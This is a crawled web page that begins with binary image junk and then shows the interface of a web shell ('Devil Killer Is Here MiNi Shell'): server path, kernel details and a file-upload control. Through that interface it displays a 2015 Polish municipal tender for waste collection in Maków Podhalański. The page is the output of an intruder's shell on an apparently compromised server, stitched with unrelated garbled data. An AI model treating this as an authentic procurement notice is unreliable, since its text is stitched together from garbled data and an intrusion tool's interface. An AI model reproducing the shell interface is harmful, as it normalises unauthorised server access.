JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151026/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151026/156111-N-2015.html

<p class="kh_header"><b>Maków Podhalański: Świadczenie usług w zakresie odbioru i transportu odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy Maków Podhalański w okresie od  dnia 09.11.2015 do dnia 31.10.2016 roku</b><br>
<b>Numer ogłoszenia: 156111 - 2015; data zamieszczenia: 26.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Maków Podhalański , ul. Szpitalna 3, 34-220 Maków Podhalański, woj. małopolskie, tel. 33 874 97 00, faks 33 874 97 51.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.makow-podhalanski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie odbioru i transportu odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy Maków Podhalański w okresie od  dnia 09.11.2015 do dnia 31.10.2016 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Odbiór i transport odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy Maków Podhalański, o których mowa w ustawie z dnia 13 września 1996 r. o utrzymaniu porządku i czystości w gminach Art. 6c ust. 1 (Dz. U. z 2012 r., poz. 391 z późn. zm.)
Przedmiot zamówienia obejmuje:
Odbiór zmieszanych  niesegregowanych  odpadów komunalnych  zgromadzonych w opisanych i nieopisanych workach koloru czarnego oraz pojemnikach z tworzywa sztucznego lub metalowych o pojemności 120 l, 1100 l,  kontenerach metalowych 7 000 l (typu KP-7) lub innych pojemników na odpady usytuowanych w szczególności przy budynkach mieszkalnych.
Odbiór segregowanych odpadów komunalnych (gromadzonych w sposób selektywny) posegregowanych na:
-papier - w opisanych workach koloru niebieskiego - o pojemności 110 l,
-tworzywa sztuczne i metal - w opisanych workach koloru żółtego - o pojemności 110 l,
-szkło - w opisanych workach koloru zielonego - o pojemności 55 l i 110 l,
-odpady ulegające biodegradacji, w tym odpady opakowaniowe ulegające biodegradacji, odpady zielone, pozostałe odpady biodegradowalne np. odpady kuchenne, odpady tytoniowe, rośliny i ziemia kwiatowa, zużyte jednorazowe worki do odkurzaczy, zużyte ręczniki papierowe i chusteczki papierowe, mokry papier i karton oraz worki i torebki papierowe, trociny, skoszona trawa, liście, pocięte gałęzie, popiół - w opisanych workach koloru fioletowego - o pojemności 110 l, pojemnikach metalowych lub kontenerach,gromadzonych w odpowiednio oznakowanych workach lub pojemnikach wystawianych przed wejściem na teren nieruchomości lub przed nieruchomość. Na obszarach górskich, na których dojazd samochodu odbierającego odpady jest utrudniony, właściciele nieruchomości zebrane odpady wystawiają w miejsca zwyczajowo przyjęte przy drodze głównej, którą porusza się samochód Wykonawcy. Na terenie nieruchomości zabudowanej budynkami wielolokalowymi (bloki), odpady zebrane selektywnie odbierane są przez Wykonawcę z zabezpieczonych pomieszczeń lub miejsc zlokalizowanych w bezpośrednim sąsiedztwie budynków. Ponadto na terenie Gminy (osiedla wiejskie) zlokalizowane są pojemniki o pojemności 1m3 do gromadzenia zbiorowego odpadów selektywnych.
Odpady wielkogabarytowe - wystawiane przed budynkiem na trasie przejazdu służb komunalnych.  
Odpady budowlane i rozbiórkowe.
Wykonawca ma obowiązek odebrać wyłącznie odpady budowlano-remontowe i rozbiórkowe z nieruchomości zamieszkałej, które powstały w wyniku prowadzenia drobnych robót budowlanych, remontowych lub rozbiórkowych niewymagających pozwolenia na budowę lub zgłoszenia prowadzenia robót budowlanych. Odpady te odbierane będą na indywidualne zamówienie złożone przez właściciela nieruchomości zamieszkałej- Wykonawcy.  Odpady niespełniające tego warunku Wykonawca ma obowiązek odebrać za dodatkową opłatą, którą pokrywa właściciel nieruchomości. 
W sytuacji gdy odpady budowlano-remontowe i rozbiórkowe, dla ich przekazania muszą zostać załadowane do większego pojemnika (kontenera), właściciel nieruchomości odpowiednio wcześniej zamawia taki pojemnik u Wykonawcy. Termin podstawienia przez Wykonawcę na teren danej nieruchomości pojemnika (kontenera): do 2 dni roboczych od zgłoszenia takiej potrzeby przez właściciela nieruchomości. Termin wywozu zgromadzonych odpadów: do 2 dni roboczych od zgłoszenia przez właściciela nieruchomości gotowości do odbioru zgromadzonych odpadów.  
Wykonawca będzie zobowiązany do zorganizowania minimum jeden raz w trakcie realizacji umowy, objazdowej zbiórki od nieruchomości zamieszkałych następujących odpadów: a)zużyte baterie i akumulatory, b)zużyty sprzęt elektryczny i elektroniczny (w tym np. zużyte świetlówki, żarówki), c)przeterminowane chemikalia (w tym opakowania po nich np. puszki po farbach, lakierach i aerozolach, zużytych smarach),
d)zużyte opony.
Koszty organizacji zbiórki oraz utylizacji zebranych odpadów ponosi Wykonawca.
Szacunkowa - maksymalnie zakładana ilość odpadów:
a) Ilość odpadów niesegregowanych (w tym wielko gabaryty) w okresie realizacji  zamówienia wyniesie ok. 2300 Mg
b) Ilość odpadów segregowanych w okresie realizacji zamówienia wyniesie ok. 340 Mg
1.6 Dostawa i dystrybucja worków do selektywnej zbiórki odpadów.
W ramach przedmiotu zamówienia Wykonawca zobowiązany będzie także do prowadzenia dystrybucji worków do selektywnej zbiórki odpadów wśród mieszkańców gminy Maków Podhalański (np. dostawa worek za worek - przy odbiorze śmieci, mobilny lub stacjonarny punkt wydawania worków, itp.). Wykonawca winien prowadzić ewidencję wydanych worków (nr domu, ilość wydanych worków)  i przekazywać ją Zamawiającemu najpóźniej do 3 dnia następnego miesiąca.
Przewidziano, że dystrybucji podlegać będzie 70% worków, pozostała ilość tj.  30% worków (kolory proporcjonalnie do całkowitej ilości) winno być dostarczone do Urzędu Miejskiego w Makowie Podhalańskim ul. Szpitalna 3, w terminie do 29 luty 2016 r.
Worki winny spełniać następujące wymagania:a)worki foliowe LDPE o wym. 700 mm x 1050 mm x 0,06 mm (folie kolorowe półprzeźroczyste, umożliwiające szybką ocenę zawartości), worki z taśmą do zawiązania  (worek i taśma stanowią komplet), 
b)nadruk kolorowy, 1-stronny, powtarzalny, wg załączonego wykazu-Wzory nadruków na workach na odpady komunalne segregowane,c)Ilość worków: 150 000 sztuk, w tym:- żółte 100 000 szt.- zielone 45 000 szt.- niebieskie 5 000 szt. 
Częstotliwość i sposób odbioru odpadów:Odbiór odpadów z terenu Gminy Maków Podhalański Wykonawca prowadzić będzie od poniedziałku do piątku w następujących godzinach:
a) teren miasta Maków Podhalański (Maków Centrum) w godzinach 7:00 - 13:00
b) pozostały teren Gminy Maków Podhalański - w godzinach 7:00 - 15:00.
Jeżeli dzień odbioru odpadów jest dniem wolnym od pracy odbiór odpadów należy zrealizować w następnym harmonogramowym terminie (np. środa wolna - odbiór odpadów w następną środę);
Częstotliwość świadczenia usług odbioru i wywozu odpadów komunalnych segregowanych i niesegregowanych oraz wielkogabarytowych wg załączonego harmonogramu odbioru odpadów na rok 2015/2016 - załącznik nr 5.
Częstotliwość świadczenia usług odbioru i wywozu odpadów takich jak: zużyte baterie i akumulatory, zużyty sprzęt elektryczny i elektroniczny (w tym np. zużyte świetlówki, żarówki), przeterminowane chemikalia (w tym opakowania po nich np. puszki po farbach, lakierach i aerolozach, zużytych smarach), zużyte opony - co najmniej jeden raz w trakcie realizacji umowy zgodnie z ustalonym między Zamawiającym i Wykonawcą harmonogramem.
Wykonawca ma obowiązek odbioru odpadów komunalnych gromadzonych w kontenerach o poj. 7000 l typu KP-7 lub innych zestawach pojemników o podobnej pojemności, udostępnianych przez Wykonawcę w miejsca wskazane przez Zamawiającego i odbieranych na zgłoszenie mieszkańców lub Zamawiającego wg potrzeb. Kontenery te będą wynajmowane przez Zamawiającego od Wykonawcy, zatem musi je mieć on w posiadaniu (tytuł własności, umowa dzierżawy itp.).   
Odpady komunalne segregowane gromadzone będą w opisanych workach kolorowych (żółty, zielony, niebieski, fioletowy), które dystrybuowane będą przez Wykonawcę oraz częściowo przez Zamawiającego.
Zamawiający zastrzega sobie prawo do codziennego sprawdzenia wagi samochodu odbierającego odpady komunalne z terenu Gminy Maków Podhalański.
Regionalna Instalacja do przetwarzania odpadów: Cały strumień odpadów komunalnych, tj. nieselektywnie zbierane odpady komunalne, odebrane od właścicieli nieruchomości w postaci zmieszanych odpadów komunalnych, pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania oraz selektywnie zbierane odpady komunalne, Wykonawca przekaże do Zakładu Zagospodarowania Odpadów w Myślenicach, z którym Zamawiający ma podpisaną umowę, będącego Regionalną Instalacją do Przetwarzania Odpadów Komunalnych, zgodnie z Uchwałą Nr XXV.398.12 Sejmiku Województwa Małopolskiego z dnia 2 lipca 2012 r. w sprawie wykonania Planu Gospodarki Odpadami Województwa Małopolskiego (z późn. zm.). 
Odpady zielone i inne bioodpady odebrane od właścicieli nieruchomości, Wykonawca przekaże zgodnie z zasadą bliskości - do regionalnej instalacji do przetwarzania selektywnie zebranych odpadów zielonych i innych bioodpadów zgodnie z §16 Uchwały Sejmiku Województwa Małopolskiego Nr XXV.398.12 z dnia 2 lipca 2012 roku (z późn. zm) w sprawie wykonania -Planu Gospodarki Odpadami Województwa Małopolskiego. 
W celu realizacji przedmiotu umowy Wykonawca musi:
-dysponować specjalistycznymi środkami technicznymi odpowiadającymi wymogom zawartym w Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 roku w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (DZ. U. z 2012 r. Nr 122) umożliwiającymi odbiór odpadów gromadzonych w workach oraz  pojemnikach, o których mowa w przedmiocie zamówienia,
-samochodem umożliwiającym odbiór odpadów komunalnych z trudno dostępnych górzystych terenów - co najmniej 2 sztuki (w tym zakresie mogą to być pojazdy wskazane powyżej jeśli nadają się do jazdy w terenach górzystych),
-dobór wielkości pojazdów powinien uwzględniać szerokość dróg na terenie Gminy i częsty brak możliwości nawracania,
-pojazdy muszą być zarejestrowane i dopuszczone do ruchu oraz posiadać aktualne badania techniczne i świadectwa dopuszczenia do ruchu zgodnie z przepisami o ruchu drogowym.
Wymagania dotyczące bazy magazynowo-transportowej:
Wykonawca zobowiązany jest posiadać bazę magazynowo-transportową usytuowaną na terenie Gminy Maków Podhalański lub w odległości nie większej niż 60 km od granicy Gminy, na terenie do którego posiada tytuł prawny. Baza musi spełniać warunki wskazane w Rozporządzeniu Ministra Środowiska z dnia 11.01.2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości.
Pozostałe  informacje: 
Charakterystyka Gminy Maków Podhalański:
a)Gmina Maków Podhalański zajmuje obszar  ok. 109 km2.
b)Gmina Maków Podhalański obejmuje miasto Maków Podhalański oraz sześć sołectw: Białka, Grzechynia, Juszczyn, Kojszówka, Żarnówka oraz Wieprzec.
c)Szacunkowa liczba mieszkańców, którzy będą objęci usługą odbierania odpadów komunalnych - to około 15 000;
-Szacunkowa liczba nieruchomości zamieszkiwanych, które będą objęte usługą odbioru odpadów komunalnych - 3750 (przy założeniu, że jedną nieruchomość średnio zamieszkują 4 osoby),
-liczba mieszkańców w zabudowie zbiorowej (16 bloków):  około 1 000 osób.
UWAGA: Powyższe dane mogą ulec zmianie na skutek ruchu ludności.
Szacunkowa - maksymalnie zakładana ilość odpadów:
Ilość odpadów niesegregowanych (w tym wielko gabaryty) w okresie realizacji  zamówienia wyniesie ok. 2 300 Mg
Ilość odpadów segregowanych w okresie realizacji zamówienia wyniesie ok. 340 Mg
Przy ilości odpadów segregowanych należy uwzględnić tendencję wzrostową odbioru ilości odpadów segregowanych z uwagi na liczne deklaracje mieszkańców o podjęciu segregacji odpadów.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.31.00-7, 90.51.20.00-9, 90.52.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium. Ustala się wadium dla całości przedmiotu zamówienia: w kwocie 20 000 złotych (słownie: dwadzieścia tysięcy złotych 00/100) w formie przewidzianej zgodnie z art. 45 ust.6 ustawy Pzp. Okres ważności wadium musi obejmować cały okres związania ofertą.
Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy Zamawiającego, przed upływem terminu składania ofert. 
Nr rachunku bankowego:
Bank Spółdzielczy Jordanów oddział w Makowie Podhalańskim
75 8799 0001 0010 0100 0114 0002
Tytuł wpłaty: Wadium postępowaniu o zamówienie publiczne nr ZP.PN.15.2015</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla spełnienia tego warunku Zamawiający wymaga od Wykonawców złożenia: zaświadczenie o nadanym numerze rejestrowym w rejestrze działalności regulowanej, prowadzonej na podstawie art. 9b i art. 9c ust. 1 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (tj. Dz. U. z 2012 poz. 391 ze zm.) oraz oświadczenie o spełnianiu warunków udziału w postępowaniu określone w art. 22 ust. 1 PZP (wg. zał. nr 2 SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla spełnienia tego warunku Zamawiający wymaga od Wykonawców złożenia na potrzeby niniejszego postępowania wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, wykonał co najmniej dwie usługi odpowiadające swoim zakresem i rodzajem usłudze stanowiącej przedmiot niniejszego postępowania - wymagane 2 usługi za kwotę min. 600 000,00 złotych brutto, z potwierdzeniem należnego wykonania umowy i z należytą starannością (wg. zał. nr 4 SIWZ) oraz oświadczenie o spełnianiu warunków udziału w postępowaniu określone w art. 22 ust. 1 PZP (wg. zał. nr 2 SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla spełnienia tego wymagu Zamawiający wymaga od Wykonawców złożenia oświadczenia, z którego wynikać będzie, że Wykonawca dysponuje niezbędnym do wykonania zamówienia sprzętem, posiada odpowiednią do realizacji przedmiotu zamówienia bazę magazynowo - transportową usytuowaną i wyposażoną zgodnie z Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 roku, w sprawie szczegółowych wymagań w zakresie: posiadania wyposażenia umożliwiającego odbieranie odpadów komunalnych od właścicieli nieruchomości oraz zapewnienia jego odpowiedniego stanu technicznego, utrzymania odpowiedniego stanu sanitarnego pojazdów do odbierania odpadów komunalnych od właścicieli nieruchomości i urządzeń do odbierania odpadów komunalnych od właścicieli nieruchomości, spełnienia wymagań technicznych dotyczących wyposażenia pojazdów, zapewnienia odpowiedniego usytuowania i wyposażenia bazy magazynowo-transportowej, zgodnie z Dz. U. z 2012 r. nr 122. oraz wykaz pojazdów i urządzeń technicznych dostępnych Wykonawcy w celu właściwej realizacji zamówienia Zamawiający wymaga:
a. kontenerów na odpady komunalne (poj. 7 000 l typu KP-7 lub inne zestawy o podobnej pojemności)  - minimum 11 sztuk kontenerów/zestawów,
b. pojazdów do zbierania i transportu odpadów komunalnych, które powinny odpowiadać wymogom zawartym w Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 roku w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (DZ. U. z 2012 r. Nr 122).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający odstępuje od sposobu dokonania oceny spełnienia warunku, dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu (wg zał. nr 2 SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla spełnienia tego wymogu Zamawiający wymaga od Wykonawcy złożenia kopii opłaconej polisy w zakresie niezbędnym do wykazania, że Wykonawca znajduje się w dobrej sytuacji ekonomicznej i finansowej a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia wykazując, że Wykonawca znajduje się w dobrej sytuacji ekonomicznej i finansowej - Zamawiający wymaga przedstawienia dokumentu świadczącego o ubezpieczeniu od odpowiedzialności cywilnej, w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę co najmniej 100 000,00 złotych (sto tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
